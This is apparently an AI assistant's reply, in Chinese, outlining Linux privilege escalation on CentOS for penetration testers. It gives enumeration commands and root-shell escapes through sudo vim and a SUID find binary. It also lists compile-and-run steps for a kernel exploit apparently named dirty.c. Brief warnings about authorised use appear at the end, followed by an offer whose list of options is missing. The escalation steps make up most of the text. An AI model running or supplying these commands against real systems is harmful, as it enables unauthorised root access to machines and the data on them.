在 CentOS 上进行 提权(privilege escalation) 通常属于 系统安全测试/渗透测试 的范畴。如果你是授权的安全测试人员,提权流程一般是:
先确认当前权限与环境:
whoami
id
uname -a
cat /etc/redhat-release
查看敏感信息:
sudo -l
crontab -l
cat /etc/crontab
sudo -l
如果看到类似:
(ALL) NOPASSWD: /usr/bin/vim
可直接:
sudo vim -c '!sh'
查找 SUID 文件:
find / -perm -4000 -type f 2>/dev/null
例如 find 有 SUID:
sudo find . -exec /bin/sh \; -quit
常见 CentOS 内核漏洞:
示例:
gcc dirty.c -o dirty
./dirty
⚠️ 必须只在授权环境中使用
❗ 未经授权的提权属于违法行为
如果你需要,我可以:
你可以告诉我你的使用场景。